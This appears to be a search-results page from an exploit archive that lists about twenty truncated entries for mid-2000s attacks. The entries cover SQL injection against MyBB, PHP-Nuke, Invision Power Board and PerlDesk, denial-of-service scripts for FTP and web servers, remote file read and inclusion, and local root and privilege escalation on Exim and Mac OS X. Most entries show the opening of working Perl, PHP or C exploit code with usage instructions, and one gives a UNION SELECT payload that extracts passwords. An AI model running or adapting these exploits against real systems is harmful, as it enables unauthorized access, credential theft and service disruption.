454 matches found
MyBulletinBoard (MyBB) <= 1.03 Multiple SQL Injection Exploit
No description provided by source. !/bin/env perl //------------------------------------------------------------- // MyBB Forum SQL Injection Exploit .. By HACKERS PAL // Greets For Devil-00 - Abducter - Almaster - GaCkeR // Special Greets For SG SecurityGurus Team And Members //...
PHP-Nuke 7.8 SQL Injection / Remote Command Execution Exploit
No description provided by source. ?php 20.05 23/10/2005 ---phpnuke78xpl.php PHPNuke 7.8 with all security fixes/patches "Downloads","WebLinks" & "YourAccount" modules SQL Injection / remote commands execution exploit yet not tested 7.9, but OK... by rgod site: http://rgod.altervista.org make the...
mybbSQL.pl.txt
!/usr/bin/perl -w use LWP::Simple; Vitem if!$ARGV0 print " MyBB Member.php SQL Injection \n"; print " Coded By \n"; print " \n"; print " + Bug By W7ED - W7EDathotmail.com \n"; print " \n"; print " Exmp:- perl file.pl mybb.net /mybb userid \n"; print " \n"; exit; my $host = 'http://'.$ARGV0; User ...
FTPshellDoS.txt
Summary: Denial of service vulnerability in FTPshell Server Version 3.38 http://www.ftpshell.com/ Details: Logging into the FTP server successfully and then closing the connection without using the QUIT command 39 times will cause the ftpshelld.exe process will die. Vulnerable Versions: FTPshell...
Remote Control Server 1.6.2 - Denial of Service
!/usr/local/bin/perl Remote Control Server DOS Exploit ------------------------------------ Infam0us Gr0up - Securiti Research Tested on Windows2000 SP4 Win NT Info: infamous.2hell.com $ARGC=@ARGV; if $ARGC !=1 print "\n"; print " Remote Control Server DOS Exploit\n"; print...
Remote File Explorer <= 1.0 Denial of Service Exploit
Exploit for unknown platform in category dos / poc ===================================================== Remote File Explorer \n"; print "Example: $0 127.0.0.1\n"; exit; use Socket; my$remote,$port,$iaddr,$paddr,$proto; $remote=$ARGV0; $port = "1001"; default port for the server $iaddr =...
simplephpBlog040.txt
. || | | .. \ \ | \ | | | | | |\ | | /| | /|/ | || || / Where is the security? ... Security Advisory 2005-0x00 Authors......... pjphem && LazyCrs Date............ 07/07/2005 Vendor.......... www.simplephpblog.com Type............ SimplePHPBlog 0.4.0 = Remote Password Disclosure o The Problem:...
AnalogX SimpleServer:WWW 1.05 - Denial of Service
AnalogX SimpleServer:WWW 1.05 - Denial of Service !/usr/bin/perl use IO::Socket; if @ARGV Prepare to start connect.\n"; sleep1; $s = IO::Socket::INET-newProto="tcp", PeerAddr=$ARGV0, PeerPort=$ARGV1, Timeout=6 or die " Target web server already DoSeD ??? or can't connect :\n\n"; $s-autoflush; pri...
AnalogX SimpleServer:WWW <= 1.05 Denial of Service Exploit
No description provided by source. !/usr/bin/perl use IO::Socket; if @ARGV 2 print "\n ::: ---------------------------------------------- :::\n"; print " ::: AnalogX SimpleServer WWW 1.05 Dos Exploit :::\n"; print " ::: :::\n"; print " ::: Advisory : http://www.ussrback.com/labs45.html :::\n";...
Yaws 1.5x - Source Code Disclosure
source: https://www.securityfocus.com/bid/13981/info A vulnerability has been reported in Yaws that may result in the disclosure of script files' source code. Information obtained in this manner may be used by the attacker to launch further attacks against a vulnerable system. Yaws 1.55 and prior...
r57ipb2.pl.txt
!/usr/bin/perl Invision Power Board SQL injection exploit by RST/GHC vulnerable forum versions : 1. , 2. 2.0.4 tested on version 1.3 Final and version 2.0.2 work on all mysql versions work with magicquotes On use %2527 for bypass magicquotesgpc = On coded by 1dt.w0lf screen: r57ipb2.pl blah.com...
PortailPHP 1.3 - ID SQL Injection
PortailPHP 1.3 - ID SQL Injection source: https://www.securityfocus.com/bid/13708/info PortailPHP is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. Successful exploitation could...
S9Y Serendipity 0.8beta4 - 'exit.php' SQL Injection
!/usr/bin/perl Serendipity 0.8beta4 exit.php SQL Injection exploit c ADZ Security Team 2004-2005 c kreon 2005 http://adz.void.ru/ [email protected] Public : print "\n\n"; print " Serendipity 0.8beta4 exit.php SQL Injection exploit\n"; print " C ADZ Security Team 2004-2005\n"; print " C kreon 2005\n";...
phpMyFamily <= 1.4.0 SQL Injection Exploit
No description provided by source. !/usr/bin/perl -w phpMyFamily Exploit injection ============================== $banner = "phpMyFamily Exploit injection \n\n============================== \n\nINFGPG-Hacking&Security Research"; Greats: AresU 1st IndoSec Team,ADZ Security Team has discovered bugs...
Ocean FTP Server 1.00 Denial of Service Exploit
No description provided by source. !/usr/bin/perl GSS-IT Research And Security Labs www.gssit.co.il Ocean FTP Server Ver 1.00 Denial Of Service POC Use This PoC For Educational Purposes Only use Socket; if $ARGV 2 print"\n"; print" Ocean FTP Server Ver 1.00 Denial Of Service POC \n"; print"\n\n";...
LimeWire 4.1.2 4.5.6 - GET Remote File Read
LimeWire 4.1.2 4.5.6 - GET Remote File Read !/usr/bin/perl Limewire 4.1.2 - 4.5.6 remote and fucking lame exploit written by lammat http://grpower.ath.cx [email protected] Discovered by Kevin Walsh use IO::Socket; $host = @ARGV0; $file = @ARGV1; unless @ARGV == 2 print "usage: $0 host file\n"; pri...
Remote Testing SocialMPN Remote File Inclusion by y3dips
!/usr/bin/perl -w Remote Testing SocialMPN Remote File Inclusion by y3dips for testing only Bug find by zer0-c00l , Bug published at http://waraxe.us/ftopic-542-0-days0-orderasc-.html print " Remote Testing File Inclusion for SocialMPN by y3dips n"; require LWP::UserAgent; if@ARGV == 2 $target=...
Exim <= 4.42 Local Root Exploit
Exploit for linux platform in category local exploits =============================== Exim include int mainint argc, char argv char addrptr; addrptr = getenvargv1; printf"%s @ %p\n", argv1, addrptr; return 0; gcc @env.c -o @env cp @env /usr/bin cd /usr/exim/bin CODE=perl -e 'print...
Apple Mac OSX Adobe Version Cue - Local Privilege Escalation (Perl)
Apple Mac OSX Adobe Version Cue - Local Privilege Escalation Perl !/usr/bin/perl -w by unl0ck-0xdeadababe http://unl0ck.void.ru http://0xdeadbabe.blackhatz.info ------------------------------------------------- Only for challenge : and Researche pruproses. Distribution:...
PerlDesk 1.x - SQL Injection
PerlDesk 1.x - SQL Injection !/usr/bin/perl Example: kb.cgi?view=0 UNION SELECT 1,3,password,username,3,7 FROM users Exploit is attached. ./pde.pl www.internethosting4u.com /perldesk/kb.cgi 148.244.150.58:80 use IO::Socket; print ' PerlDesk exploit Usage: ./pdsploit.pl host path proxy Vunerabilit...